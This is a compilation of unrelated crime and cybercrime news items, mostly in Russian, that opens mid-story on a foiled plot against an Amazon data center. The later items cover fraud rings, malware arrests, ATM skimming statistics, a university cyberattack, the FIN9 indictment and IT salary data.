If he is found guilty of planning to blow up Amazon's Virginia data center, Pendley faces up to 20 years in federal prison.
"We are indebted to the concerned citizen who came forward to report the defendant’s alarming online rhetoric," Acting US. Attorney Prerak Shah said.
"In flagging his posts to the FBI, this individual may have saved the lives of a number of tech workers.
"We are also incredibly proud of our FBI partners, who ensured that the defendant was apprehended with an inert explosive device before he could inflict real harm."
Amazon shared the following statement with BleepingComputer about the planned attack.
“We would like to thank the FBI for their work in this investigation. We take the safety and security of our staff and customer data incredibly seriously, and constantly review various vectors for any potential threats. We will continue to retain this vigilance about our employees and customers.” - An AWS Spokesperson.
Click to expand...
Update 4/9/21 6:02 PM EST: Added statement from Amazon
В скомпрометированных учетных записях фигуранты получали платежные данные пользователей и использовали их для онлайн-шопинга. За содеянное злоумышленникам может грозить до 6 лет заключения.
В киберполицию Черновицкой области поступили обращения от граждан Италии, пострадавших от противоправной деятельности. Заявители отследили, что товары, заказанные с использованием их аккаунтов, отправляют в Украину.
Киберполиция Буковины совместно со следователями районного управления полиции разоблачила причастных. Во время расследования указанного факта, киберполицейские обратились к правоохранителям Италии и получили от них информацию, что от действий злоумышленников пострадали несколько сотен их граждан.
Полицейские установили, что трое мужчин 22-23-х лет взламывали учетные записи пользователей онлайн-аукционов по продаже товаров. В скомпрометированных аккаунтах фигуранты получали авторизованные данные платежных систем (платежные реквизиты). Используя эти сведения, злоумышленники совершали покупки в Интернете.
Кроме этого, участники группы у DarkNet покупали скомпрометированные учетные записи социальных сетей. После - несанкционированно вмешивались в их работу и настраивали рекламу, уплата за которую взималась с банковских карточек потерпевших. За такие действия злоумышленники получали прибыль от посредников рекламодателей.
В Черновцах и в Киевской области правоохранители провели обыски. По результатам изъяли компьютерную технику, мобильные телефоны, банковские карточки, носители информации и около 200 тысяч гривен. Во время предварительного осмотра изъятой компьютерной техники правоохранители обнаружили скомпрометированные данные доступа к персональным компьютерам и социальным сетям нескольких тысяч граждан Чехии, Италии, Франции, Германии, Эстонии, Испании, Великобритании, Польши и др.
По данному факту открыто уголовное производство по ч.2 ст.361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи) Уголовного кодекса Украины. Злоумышленникам может грозить от трех до шести лет лишения свободы. Решается вопрос об объявлении подозрения. Следственные действия продолжаются. Процессуальное руководство осуществляет Черновицкая окружная прокуратура.
Профит бизнесменов составил 300м рублей.
В Москве неизвестные обстреляли двух мужчин на улице Пресненский вал в Москве,
забрали у них сумку с деньгами и скрылись на автомобиле. Предварительно,
похищено порядка 300 млн рублей.
Нападение совершили на курьеров.
По имеющимся данным, мужчины несли деньги к своему Chevrolet, припаркованному рядом с банком. В этот момент к ним подъехал Mercedes, из которого вылетели преступники, сделали несколько выстрелов, вырвали чемодан и быстро умчались.
Известно, что один из курьеров в ходе нападения пострадал. Ему оказали медицинскую помощь на месте происшествия. Грабители вели стрельбу из травматического пистолета.
Порядка 7 млн рублей курьерам удалось сохранить благодаря тому, что порвалась сумка, в которой находились деньги.
Жительница США Калли Джаго (Calli Jagoe) потратила пять месяцев на борьбу с банком Ally, чтобы вернуть украденные у нее шесть тысяч долларов. Как она рассказала WCNC-TV Charlotte, деньги были сняты 23 транзакциями в период с 25 марта по 5 апреля 2023 года.
Банковские записи показывают, что транзакции были разными — от случайных небольших сумм компаниям в Калифорнии и Техасе до нескольких более крупных выплат через стороннюю службу онлайн-платежей. При этом в Ally изначально согласились восстановить около тысячи долларов, заявив, что окажут помощь в возврате средств непосредственно у продавцов товаров. Тем не менее сделать это в первые пару месяцев разбирательств не удалось.
«Это повергло меня в яму отчаяния как в финансовом, так и в эмоциональном плане, — сказала Джаго журналистам. — Я пропустила четыре дня работы. Я часами разговаривала по телефону и еще больше времени потратила на просмотр документов».
В итоге потерпевшая, заручившись поддержкой журналистов, подала жалобу в Генеральную прокуратуру штата Северная Каролина. Спустя без малого пять месяцев после кражи денег, ей удалось добиться их восстановления на своих счетах.
«Мы стремимся сделать процесс возврата средств максимально простым и не сопряженным с эмоциональными потрясениями, — сухо констатировали в Ally. — Нам очень жаль, что Джаго потратила столько времени на положительное разрешение ее вопроса».
source: msn.com/en-us/money/personalfinance/6000-returned-to-womans-ally-bank- account-after-it-was-stolen-from-her/ar-AA1g0pzb
Свердловская областная прокуратура утвердила обвинительное заключение в отношении москвича, рожденного в 2000 году. Молодой человек обвиняется в создании, использовании и распространении вредоносных программ, а также в незаконном доступе к компьютерной информации.
По данным следствия, 26 мая 2021 года обвиняемый прибыл в Екатеринбург и начал активно использовать вредоносные программы в компьютерных клубах города. Он устанавливал на ПК специальное ПО для майнинга криптовалюты, что приводило к нестабильной работе компьютеров.
17 октября 2021 года москвич привлек к сотрудничеству гражданина Кыргызстана. Вместе они продолжили незаконную деятельность, в результате чего были затронуты еще четыре компьютерных клуба.
Обвиняемый полностью признал свою вину. Дело передано в Ленинский районный суд Екатеринбурга для рассмотрения по существу.
Полицейская служба Европейского союза (Евпропол) совместно с правоохранительными органами девяти государств пресекла деятельность нелегального даркнет-рынка Monopoly Market, а также арестовала 288 подозреваемых, причастных к покупке и продаже наркотических веществ.
Согласно информации на сайте ведомства, в результате операции было изъято более 50,8 млн евро наличными и в виде виртуальных валют,117 единиц огнестрельного оружия и 850 кг наркотиков, в том числе 258 кг амфетамина, 43 кг кокаина, 43 кг МДМА и свыше 10 кг ЛСД и таблеток экстази.
В США произвели 153 ареста, в Великобритании – 55, в Германии – 52, в Нидерландах – 10, в Австрии – 9, во Франции – 5, в Швейцарии – 2, в Польше и Бразилии – по одному. Поскольку в ходе операции правоохранительные органы получили доступ к большому перечню покупателей и поставщиков, тысячи клиентов даркнет-рынка по всему миру теперь также находятся под угрозой судебного преследования. Расследование продолжается.
source: europol.europa.eu/media-press/newsroom/news/288-dark-web-vendors- arrested-in-major-marketplace-seizure
Суд признал украинца виновным в распространении вредоносного ПО, предназначенного для несанкционированного вмешательства в работу компьютеров.
По данным следствия, в июне 2020 года, злоумышленник на своем ноутбуке создал вредоносное ПО, которое замаскировал под программу, предоставляющую уникальные возможности пользователям компьютерной игры GTA. Далее хакер загрузил этот файл на один из файлообменников в Интернете. При попытке загрузки файла «Sobeit.zip» у пользователей загружался файл под навзанием «sobeit_28080405.exe», в котором, согласно заключению эксперта, было обнаружено программное обеспечение, которое антивирусными программами распознается как вредоносное, а именно Trojan: Win32 / Tnega! Ml. С помощью этого ПО можно осуществлять электронное наблюдение за действиями пользователя (перехват данных ввода с клавиатуры, создание скриншотов, получения списка активных программ и т.д.).
31 мая 2021 между прокурором и подозреваемым было заключено соглашение о признании виновности, согласно которому подозреваемый полностью признал свою вину в совершении преступления, предусмотренного ч. 1 ст. 361-1 УК Украины, искренне раскаялся в содеянном и активно способствовал раскрытию преступления. Также стороны согласовали назначение обвиняемому наказания в виде одного года лишения свободы с испытательным сроком в один год.
Суд утвердил соглашение о признании виновности и также обязал мужчину оплатить сумму 2402, 68 грн за проведение судебной экспертизы.
В Санкт-Петербурге арестован некий Кирилл Москаленко, который, по версии следствия, мог участвовать в обнальной схеме на невероятную сумму – 18 миллиардов рублей. Что пока можно сказать точно, предпринимателем занимаются «экономические» службы как Литейного, так и Лубянки. Арестованных может оказаться до ста человек. На середину мая задержано либо арестовано 78 человек, и каждый новый день может увеличить цифру. И Москаленко совсем не главный фигурант, как кажется на первый взгляд.
Откуда взялась потрясающая воображение цифра в 18 миллиардов рублей, в отмывании которой обвиняют мало кому известного «Корейко» из Санкт-Петербурга Кирилла Москаленко? Информация пошла от пресс-службы управления ФСБ по Петербургу. Правоохранительные органы СК возбудили уголовные дела по статьям 159, 172, 187 и 210 УК РФ («Мошенничество», «Незаконная банковская деятельность», «Неправомерный оборот средств платежей», «Организация преступного сообщества или участие в нём»). Конкретно про Петербург комитет сообщает, что произошло обналичивание на семь миллиардов. В основном через фирму «Строй-инвест».
Сайт телевизионного петербургского канала «78» сообщает: «По Петербургу проведено более 40 обысков. Наложены аресты более чем на 150 расчетных счетов как физических, так и юридических лиц». По данным источников корреспондента «Нашей версии», основную часть работы в Питере проводили и проводят сотрудники управления «К». Сайт «Делового Петербурга подчеркивает этническую направленность ОПГ - помимо ее возможного руководителя гражданина Грузии Темура Псутури в схемах могли участвовать не менее восемнадцати уроженцев Дагестана.
Ирина Волк, официальный представитель МВД РФ, сообщила в своем телеграм- канале:
«Зная о реализуемой в северной столице программе помощи многодетным семьям в виде земельного капитала и федеральной программе по предоставлению материнского капитала, они (обнальщики) через доверенных лиц из Дагестана подыскивали жительниц этого региона, имеющих трех и более детей. Затем сообщники обеспечивали им фиктивную регистрацию в Петербурге и получали от многодетных мам ключи доступа к порталу «Госуслуг», а их паспорта и другие документы, включая доверенности на сделки, передавали или пересылали по почте. Семьи из Дагестана не выезжали и намерения жить в Петербурге не имели».
Click to expand...
Телеграм-канал «ВЧК-ОГПУ» подтверждает (ссылаясь на источники, которые известны и автору) достоверность информации в целом, но не по детальным цифрам: «... данная группировка работала по меньшей мере с 2020 года. Тогда Темур Псутури купил офис в Петербурге, в доме №19 на 7-й Красноармейской улице и оформил его на номинала Андрея Мирончика. Тогда же было приобретено и основное юрлицо обнального куста – ООО «РСФ «Глория», руководить которым стала номинал Юлия Дюжева. Скоро по данному адресу были зарегистрированы десятки юрлиц, на которые и перечислялись безналичные миллиарды. Полтора десятка людей Псутури, работавших в офисе постоянно, были разделены на несколько подразделений. Задержанный Кирилл Москаленко был замом Псутури и руководил всеми процессами в его отсутствие. Руслан Алибеков (скрывается за рубежом) отвечал за безопасность, конспирацию и, в сотрудничестве с адвокатом Константином Цквитария - за связи с правоохранителями. Теневых операционистов контролировала дочь Псутури Елена с той же фамилией (находится в Грузии), группу бухгалтеров возглавляла Людмила Сытник (задержана), юристов – Руслан Утяганов. Координацию работы с банками осуществлял Сергей Лукьянов (задержан). Еще источник данного канала добавляет: «В середине 2021 года группа Псутури расширила свою деятельность на территорию Москвы, где обзавелась собственным офисом в знатном БЦ «Премьер Плаза» на Пресне, в который переехала часть питерских сотрудников под руководством Лукьянова».
Эта информация, как и все из анонимных источников, конечно, нуждается в проверке, но почему нет, вероятность большая. Данные одного питерского сотрудника этой организации уже приватно показали, что аресты (уже не задержания) указанных лиц действительно состоялись. Связанные друг с другом разными путями и путами телеграм-каналы «Лиса Базилио» и «ВЧК-ОГПУ», конечно, сильны инсайдами из «комитета». Потому в разумных пределах верить можно. Источник корреспондента «Нашей версии» в органах Махачкалы сообщил: «У нас арестованы пока девять человек, но работа ведется. Можно сказать только началась. Здесь важно проследить всю банко-картовскую систему, все платежи- переводы, а их десятки тысяч. Работаем. Да, это почти все женщины, подозреваемые. Объем мошенничества огромен, сколько томов будет по этим уголовным делам, даже не представить пока. А питерские сотрудники у вас в Питере как раз работают по Москаленко. Он тот самый неповторимый свидетель по Глебу Жеглову – знает всю бухгалтерию ОПГ».
Сейчас, по некоторым данным, Кирилл Москаленко может находиться в следственном изоляторе ФСБ по Питеру на Шпалерной улице. Говоря не шершавым языком плаката, а скучным языком УК и УПК, является следственно-арестованным. Обвинения уже предъявлены. Но, если брать практику таких дел, в обмен на «деятельное сотрудничество» может получить не самый большой срок.
Источник в правительстве Санкт-Петербурга, между тем, считает, что коррупционные цифры сильно преувеличены по каким-то причинам, приводит факты: «Берем сайт госуслуг. Вот официальная информация. Многодетные семьи, состоящие на учете в качестве нуждающихся в земельном участке для дачного строительства, могут оформить сертификат «Земельный капитал в Санкт-Петербурге». Он помогает возместить расходы на покупку участка. Размер сертификата в 2024 году составляет 451 634 руб. 58 коп. После его выдачи сумма, указанная в сертификате, не индексируется (не меняется). Много ли это? И о каких тут миллиардах обнала может идти речь? По данным питерского Следкома, в Санкт- Петербурге обналичено почти 7 миллиардов, но давайте считать на калькуляторе: чтобы обналичить 7 млрд рублей, надо привлечь многодетных 15499 семей в том же Дагестане. Их просто столько нет – смотрю официальные внутренние документы. Как проверить количество семей из Дагестана, получивших земельный сертификат в СПб: сделать запрос о том, сколько многодетных семей, имеющих временную регистрацию в Питере, получили земельные сертификаты (период еще надо посмотреть). По ним сделать запрос об их постоянной регистрации (эта информация должна присутствовать при заполнении формы на получение земельного сертификата). Тут что-то явно не сходится».
Вот такое мнение от специалиста, работающего в жилищной сфере 21 год. Посмотрим, чем дело обернется, белых ниток в нем пока много, зато немало арестованных. Но некое недоумение касается суммы обнала, а не собственно, процесса серых схем с участием огромного количества чиновников и правоохранителей. Без соучастия последних такие вещи невозможны чисто технически. И хорошо, если эти уголовные дела разберут по уму и справедливости, чтоб не повадно было другим людям с удостоверениями.
Сотрудники Управления уголовного розыска УМВД России по Томской области задержали троих местных жителей. Они подозреваются в совершении нескольких эпизодов телефонного мошенничества.
«Предварительно установлено, что в городе Томске злоумышленники устроили в квартире кол-центр, который оборудовали средствами связи и компьютерной техникой. Они звонили пенсионерам и рассказывали, что их родственник стал виновником ДТП. За освобождение от уголовной ответственности требовали деньги. Затем к ним отправляли курьера, который забирал денежные средства и переводил на банковские счета, оформленные на третьих лиц. Обманутыми оказались семеро пожилых жителей города Северска Томской области. Общий ущерб превысил два миллиона рублей», - сообщила официальный представитель МВД России Ирина Волк.
В результате оперативно-розыскных мероприятий полицейские совместно с коллегами из Росгвардии задержали подозреваемых. В ходе обысков изъято более ста банковских карт, мобильные телефоны, компьютерная техника.
«Следователями СО УМВД России по ЗАТО г. Северск Томской области возбуждены уголовные дела по признакам преступлений, предусмотренных частями 2 и 3 статьи 159 УК РФ, которые в настоящее время соединены в одно производство. Фигурантам избраны различные меры пресечения», - добавила Ирина Волк.
Сотрудники УФСБ России по Новосибирской области задержали 31-летнего жителя Оби, который с 2018 года похищал криптовалюту у пользователей интернета с помощью вредоносных программ.
По версии следствия, мужчина купил на закрытых интернет-ресурсах «вредоносные программы для кражи паролей пользователей», при помощи которых с 2018 года занимался «хищением криптовалюты». Жертвами хакера стали свыше 1 тыс. пользователей сети, - рассказали в пресс-службе.
В отношении мужчины следователи возбудили уголовное дело по ч. 1 ст. 273 УК России «Создание, использование и распространение вредоносных компьютерных программ». В настоящее время проводятся дополнительные оперативные мероприятия по выявлению других эпизодов противоправной деятельности подозреваемого.
Следственный комитет и МВД установили и задержали участника скам-группы, занимавшейся фишингом на территории Беларуси, сообщили в пресс-службе СК.
По данным следствия, 18-летний житель Гомеля входил в состав организованной преступной группы, совершавшей интернет-мошенничества. Молодой человек вступал в переписку с потенциальными жертвами на торговых интернет-площадках, в ходе которой отправлял им фишинговую ссылку. Потерпевшие вводили реквизиты своих банковских карт, и с карт-счета списывались все имеющиеся денежные средства.
Также сообщается, что парень являлся модератором чата скам-группы и предоставлял участникам физические и виртуальные номера телефонов для совершения преступлений.
За время своей преступной деятельности он заработал около 600 тысяч российских рублей (около 6,9 тысячи долларов).
Следователи возбудили в отношении парня уголовное дело по ст. 212 УК Беларуси (Хищение путем модификации компьютерной информации). К нему применена мера пресечения в виде заключения под стражу.
Большую часть преступлений составляет скимминг и физическое разрушение банкоматов.
Европейская ассоциация безопасных транзакций (EAST) сообщает , что в 2022 году европейские банки потеряли €211 млн. из-за преступных группировок, и подавляющее большинство убытков пришлось на скимминговые устройства, установленные в банкоматах по всей Европе.
EAST, отраслевая группа банков и поставщиков банкоматов также заявили, что убытки из-за скимминг-устройств на банкоматах составили всего €140 000. Это самый низкий показатель с тех пор, как EAST начал отслеживать такую статистику – количество таких атак сократилось на 40%.
В скимминг-атаки также входит так называемая атака «черного ящика» (black box attack). В рамках атак «черного ящика» злоумышленник открепляет внешний корпус банкомата для доступа к его портам или вырезает отверстие в корпусе для прямого доступа ко внутренней проводке или другим скрытым разъемам. Используя данные точки доступа, злоумышленник подключает устройство «черный ящик» (обычно ноутбук или плату Raspberry Pi) ко внутренним компонентам банкомата, которые используются для отправки команд и хищения денежных средств.
EAST подчеркивает, что большинство таких атак в последнее время были безуспешными — общие потери, связанные с такими инцидентами, составили всего около €136 000 евро.
Статистика, составленная EAST
Совершенно очевидно, что скимминг карт является гораздо более важной проблемой. По данным EAST, скимминговые атаки принесли убытки в €167 млн.
Поэтому людям всегда нужно обращать внимание на скиммеры и проводить быстрый визуальный или физический осмотр банкомата перед его использованием. Особенно рекомендуется присмотреться к устройству чтения карт.
Скиммер, установленный на устройство чтения карт
EAST также обеспокоен физическими атаками на банкоматы, особенно увеличением краж с помощью подрыва банкоматов. Количество похищений с помощью взрывов и простого разрушения банкоматов увеличилось на 16% и 8% соответственно. Несмотря на то, что уже приняты меры для снижения риска таких атак, каждая атака наносит значительный ущерб оборудованию и зданиям, и может представлять угрозу для жизни людей.
source: association-secure-transactions.eu/atm-explosive-attacks-in-europe- rise-again
Canadian undergraduate research university Lakehead has been dealing with a cyberattack that forced the institution earlier this week to cut off access to its servers.
The school's services, including its website, have been down since Tuesday, with personnel shutting down computers on the Thunder Bay and Orillia campuses to stop the attack from spreading.
In a communication on Thursday, Lakehead University provided some details
about the attack saying that it was aimed at its file share servers. The
school did not disclose the nature of the incident, though.
“As soon as Lakehead’s Technology Services Centre (TSC) became aware of the
potential threat to our servers, TSC removed all access to them,” the
University said.
An investigation is underway, trying to determine what servers and information have been impacted by the security incident. Until the assessment completes, “all information used and stored on our file share servers will be inaccessible, and on-campus computers will not be available for use.”
The University recommends anyone that kept credential sets in documents on its file sharing system or on a campus office computer to change their passwords as a precaution.
While this is a sensible recommendation in case of a breach, the fact that the attack spread to campus office computers may indicate a ransomware attack. However, as previously mentioned, the University has not disclosed the nature of the attack or its extent.
At this point, school officials have not said if the attack impacted personal or financial information handled by the University.
Lakehead University has canceled all its events, including webinars and virtual Thunder Bay and Orillia campus tours scheduled for this Friday.
Because all the services are down, some students could not communicate with their instructors, get their academic calendar, use the library, submit papers or payments with a deadline.
In a tweet on Friday, Lakehead University offered a possible solution for students, faculty, and staff to get email access. This method does not work in all cases, though. The school said that if the login information is available in the browser, users could load Gmail inbox.
Students rely on the school's services to access online learning platforms. Course links, Google services (Gmail, Docs), and the University library are essential for them to prepare for midterms.
For the time being, University officials have not decided about the moving the deadlines for assignments, deferring exams, or extending reading week, despite a students' petition, but are not excluding it. They are aiming to restore services soon and start classes on Monday.
Великобритания считает, что Россия укрывает киберпреступников, а ее действия в киберпространстве направлены на подрыв основ демократических обществ.
Глава МИД Великобритании Доминик Рaaб заявил, что Россия укрывает преступников. Конкретных имен министр не назвал. По его мнению, Москва недостаточно активно борется с нарушениями международных законов. Кроме того, Рааб считает, что действия России и Китая в киберпространстве направлены на подрыв основ демократии.
Глава МИД Великoбритании выступит сегодня на конференции Национального центра кибербезопасности (National Cyber Security Centre, NCSC) Соединенного Королевства. Отрывки из его речи привело британское внешнеполитическое ведомство, отмечает издание.
«Враждебные государственные акторы и криминальные группировки хотят подорвать основы нашего общества и демократии. Давайте скажем прямо: такие страны, как Россия, обязаны преследовать преступников, котoрые действуют с их территории, а не покрывать их», - приводит внешнеполитическое ведомство выдержки из речи министра.
Рааб утверждает, что КНДР, Ирaн, Россия и Китай не соблюдают принципов демократии, а "используют цифровые технологии для саботажа и кражи данных". Также в сообщении говорится о том, что Лондон выступает за создание "широкой коалиции стран для разработки международных правил, которые идут во благо всем", чтобы защититься от государств, "совершaющих злонамеренные кибератаки".
НЬЮАРК, Нью–Джерси - было обнародовано обвинительное заключение, обвиняющее четырех граждан Вьетнама в их причастности к серии компьютерных вторжений, в результате которых компании-жертвы в совокупности понесли убытки на сумму более 71 миллиона долларов, объявил прокурор США Филип Р. Селлинджер.
Согласно обвинительному заключению, Та Ван Тай, он же ”Куин Хоа“, он же ”Бич Туи"; Нгуен Вьет Куок, он же “Тьен Нгуен”; Нгуен Транг Сюен; и Нгуен Ван Чыонг, он же “Чунг Нгуен”, ( Ta Van Tai, aka “Quynh Hoa,” aka “Bich Thuy;” Nguyen Viet Quoc, aka “Tien Nguyen;” Nguyen Trang Xuyen; and Nguyen Van Truong, aka “Chung Nguyen,” ) были членами сложной международной киберпреступной группировки, известной как “FIN9”. По крайней мере, с мая 2018 года по октябрь 2021 года обвиняемые взламывали компьютерные сети компаний- жертв по всей территории Соединенных Штатов и использовали их доступ для кражи или попытки кражи не- общественная информация, выплаты работникам и фонды. Обвиняемые причинили своим жертвам убытки на сумму более 71 миллиона долларов.
“Обвиняемые FIN9 были успешными международными хакерами, которые в течение многих лет предположительно использовали фишинговые кампании, атаки на цепочки поставок и другие методы взлома, чтобы украсть миллионы у своих жертв. Все это они делали, прикрываясь клавиатурами, VPN и поддельными удостоверениями личности, и даже тогда Министерство юстиции их обнаружило. Мой офис по- прежнему привержен делу обеспечения справедливости для жертв, и киберпреступники повсюду должны обратить на это внимание ”.
Прокурор США Филип Р. Селлинджер
“Киберпреступники маскируются в виртуальном мире, прячась в пространстве, которое большинство людей не может видеть и не понимает”, – сказал ответственный специальный агент ФБР в Ньюарке Джеймс Э. Деннехи. “Какими бы умными ни были эти хакеры, полагающие, что они умеют маскироваться, эти члены группы FIN9 не смогли скрыть, что они вывозили данные из компаний своих жертв. Оперативная группа ФБР по кибербезопасности в Ньюарке и наши партнеры по правоохранительным органам используют точные и инновационные методы, чтобы разоблачить этих людей такими, какие они есть, – простыми ворами. Мы просим любой бизнес или компанию, столкнувшуюся с подобной атакой, немедленно связаться с нами, чтобы защитить ваши системы и помешать этим преступникам перейти к следующей жертве ”.
Согласно документам, поданным по этому делу, и заявлениям, сделанным в суде:
Члены FIN9, включая обвиняемых, получили несанкционированный доступ к компьютерным сетям компаний–жертв с помощью фишинговых кампаний или других методов, таких как атаки по цепочке поставок - тип кибератаки, целью которой является нанесение ущерба организации путем нацеливания на компьютерные сети надежных сторонних поставщиков, которые предлагают услуги или программное обеспечение, жизненно важное для цепочки поставок. Получив доступ к сетям своих жертв, члены FIN9, включая обвиняемых, использовали этот доступ для извлечения или попытки извлечения непубличной информации, пособий сотрудникам и / или денежных средств. Например, обвиняемые получили доступ к программам поощрения сотрудников, поддерживаемым их жертвами, и перенаправили цифровые выплаты сотрудникам, такие как подарочные карты, на счета, контролируемые обвиняемыми. Обвиняемые также украли информацию о подарочных картах, хранящуюся в компьютерных сетях определенных жертв.
Обвиняемые дополнительно украли личную информацию и данные кредитных карт, связанные с сотрудниками и клиентами компаний-жертв. Пытаясь скрыть свои личности, обвиняемые иногда использовали эту информацию для содействия заговору, например, регистрируя онлайн-аккаунты на криптовалютных биржах или в компаниях, занимающихся размещением серверов, на имена физических лиц, чьи личности были украдены. Тай, Сюен и Труонг продавали украденные подарочные карты третьим лицам, в том числе через учетную запись, зарегистрированную на вымышленное имя на пиринговом рынке криптовалют, чтобы скрыть источник украденных денег.
Тай, Куок, Сюйен и Чыонг обвиняются по одному пункту обвинения в сговоре с целью совершения мошенничества, вымогательства и связанной с компьютерами деятельности; по одному пункту обвинения в сговоре с целью совершения мошенничества по электронной почте; и по двум пунктам обвинения в умышленном повреждении защищенного компьютера. В случае признания виновными им грозит до пяти лет тюремного заключения за сговор с целью совершения мошенничества, вымогательства и связанной с компьютерами деятельности; до 20 лет тюремного заключения за сговор с целью совершения мошенничества по электронной почте; и до 10 лет тюремного заключения по каждому пункту обвинения в умышленном повреждении защищенного компьютера. Тай, Сюйен и Чыонг были предъявлены обвинения по одному пункту обвинения в сговоре с целью отмывания денег, что влечет за собой обязательное максимальное наказание в виде 20 лет тюремного заключения. Тай и Куок также были предъявлены обвинения по одному пункту обвинения в краже личных данных при отягчающих обстоятельствах, что влечет за собой обязательный двухлетний тюремный срок подряд, и по одному пункту обвинения в сговоре с целью совершения мошенничества с личными данными, что влечет за собой максимальное наказание в виде 15 лет тюремного заключения.
Прокурор США Селлинджер приписал киберотряду ФБР в Ньюарке под руководством ответственного специального агента Джеймса Э. Деннехи в Ньюарке. Он также поблагодарил киберотряд ФБР Литл-Рок под руководством ответственного специального агента Алисии Д. Кордер.
Правительство представляют помощники прокурора США Энтони П. Торнторе и Винай С. Лимбачиа из Отдела прокуратуры США по борьбе с киберпреступностью в Ньюарке.
Обвинения, содержащиеся в обвинительном заключении, являются всего лишь обвинениями, и подсудимые считаются невиновными до тех пор, пока их вина не будет доказана.
• Source: https://www.justice[.]gov/usao-nj/p...oup-fin9-charged-roles- attacking-us-companies
• Source: https://www.justice[.]gov/usao-nj/media/1356656/dl?inline
Опубликован рейтинг зарплат российских Unix-сисадминов в городах-миллионниках. За минувшие три года они стали получать в среднем на 30% больше, но при этом объем знаний и умений, который будут требовать от них работодатели, за эти годы изменений почти не претерпел. Зато изменился средний возраст Unix- специалиста – он «постарел» на три года.
Сколько платят за знание Unix
Российские системные администраторы, работающие с Unix-системами, за последние три года стали получать значительно больше денег за свои труды. Как сообщили CNews аналитики сервиса по поиску работы SuperJob, зарплаты Unix-сисадминов резко выросли во всех крупнейших городах России.
На самую высокую зарплату в России Unix-администраторы, как и тремя годами ранее, могут рассчитывать в Москве 90-350 тыс. руб. в июне 2024 г. при средней 180 тыс. руб. против 70-250 тыс. руб. в марте 2021 г. при средней 130 тыс. руб.
Второе место в рейтинге – у Санкт-Петербурга с результатом 60-210 тыс. руб. в 2021 г. (средняя 110 тыс. руб.) и 80-290 тыс. руб. в 2024 г. (средняя 150 тыс. руб.). Замыкает тройку лидеров Екатеринбург – 60-210 тыс. руб. (110 тыс. руб. средняя) три года назад и 75-285 тыс. руб. (средняя 150 тыс. руб.) сейчас.
В марте 2021 г. Unix-администратор из Волгограда получал от 50 до 170 тыс. руб. в месяц в зависимости от опыта работы и багажа знаний и 90 тыс. в среднем. В июне 2024 г. диапазон зарплат в этом же городе варьируется уже от 65 до 250 тыс. руб., а средняя зарплата составляет 130 тыс. руб.
Волгоград регулярно попадает в тройку лидеров в списках городов-миллионников (в России их всего 16) по самому низкому уровню зарплат. Новый рейтинг SuperJob исключением не стал, но даже в Волгограде зарплаты системных администраторов Unix заметно выросли. Теперь они в среднем получают столько же, сколько московские три года назад.
Заработная плата системного администратора Unix в 2024 году
Меньше волгоградских Unix-специалистов сейчас получают только их коллеги из Уфы. В марте 2021 г. диапазон зарплат был от 50 до 180 тыс. руб. при средней в 90 тыс. руб., в июне 2024 г. – от 60 до 240 тыс. руб. (средняя – 125 тыс. руб.).
Что нужно знать и уметь
В России многие ИТ-специалисты могут похвастаться быстрым ростом зарплат, но при этом и требований к ним со стороны работодателей становится все больше. Это отчетливо видно, к примеру, по системным администраторам, работающим с системами на Windows – в апреле 2024 г. CNews писал, что за три с половиной года они стали получать примерно на 25-45% больше, но и список требований к ним вырос в значительной степени. А PHP-программистам повезло еще меньше – их годовой рост зарплат (2023-2024 гг.) не перекрыл инфляцию, а требовать от них все равно стали больше.
Что касается администраторов Unix-систем, то список необходимых навыков для джунов и сеньоров за три года изменений не претерпел. Разве что при приеме на работу топового специалиста у него могут поинтересоваться о наличии у него навыков свободного общения на английском, но это лишь опция, а не обязательное условие заключения трудового договора.
Требования работодателей к системным администраторам Unix в 2024 году
Аналитики SuperJob делят всех Unix-администраторов на четыре категории по уровню знаний и зарплаты. Специалистам второй и третьей категорий теперь приходится знать больше, нежели три года назад, чтобы иметь возможность получать более высокую зарплату. К примеру, сейчас от них требуют, в частности, наличия профессиональных сертификатов и опыта построения VPN-сетей. При этом, как и раньше, работодатели видят в таких специалистах еще и безопасников – от них ждут расширенных познаний в информационной безопасности.
Системные администраторы стареют
За три года некоторые изменения претерпел и портрет среднестатистического специалиста, желающего устроиться на должность системного администратора Unix. Три года назад средний возраст таких соискателей составлял 37 лет, 99% были представителями мужского пола, 80% имели высшее образование, 28% были готовы к переезду, 32% являлись безработными на момент размещения резюме, а среднее время работы в предыдущей компании у них составляло пять лет.
К июню 2024 г. средний возраст соискателей повысился до 40 лет, а количество кандидатов на вакансию, окончивших вуз, сократилось до 70%. Профессия Unix- администратора по-прежнему остается мужской – лишь 2% соискателей являются представителями женского пола. На момент размещения резюме не имели работу 34% соискателей. Прочие параметры не изменились: 28% готовы к переезду, средний срок работы на последнем месте – пять лет.
Удаленный бизнес на инвестициях в криптовалюту интересует граждан всех возрастных категорий. Не вдаваясь в подробности реальной деятельности платформ по операциям с цифровыми активами, многие бездумно вкладывают семейные сбережения в «прибыльную» мечту. К сожалению, такие истории чаще всего заканчиваются не приобретением миллионных капиталов, а утратой накоплений и возбуждением уголовного дела.
Жительница Центрального района столицы, 73-летняя пенсионерка, была уверена, что в январе текущего года ей позвонил реальный представитель криптобиржи. Звонок поступил с иностранного номера, однако минчанку это не смутило. Собеседник с первых минут расположил потенциального клиента, отметив, что ему известно о ранних участиях женщины в инвестиционной программе. Оказалось, еще в 2017 году она зарегистрировалась на сайте этого криптообменника, однако участие в торгах не принимала. При разговоре менеджер подробно рассказал о плюсах продолжения сотрудничества и минчанка уверенно согласилась.
В ходе общения пенсионерка под руководством персонального «консультанта» установила специализированное приложение для отслеживания своих виртуальных активов. В свою очередь, менеджер платформы зарегистрировал для нее несколько учетных записей, куда в последствии она должна была переводить деньги.
В конце января минчанка провела первую транзакцию. Далее на протяжении нескольких месяцев она пополняла счет посредством интернет-банкинга, а в случаях невозможности осуществить трансфер – передавала деньги через курьеров. Самые большие вложения женщина сделала в феврале и марте, где виртуальный бизнес потребовал для «перспективного» развития более 35 тысяч долларов. Уверенность в реальности происходящего вселяло то, что все переданные средства отображались в учетных записях.
Минчанка и дальше собиралась инвестировать в виртуальные активы, пока ее супруг не заподозрил обман. Мужчина узнал от вдохновленной женщины, что она уже выгодно вложила в стартап более 165 тысяч белорусских рублей. Однако вместо партнерского одобрения муж посоветовал немедленно обратиться в правоохранительные органы.
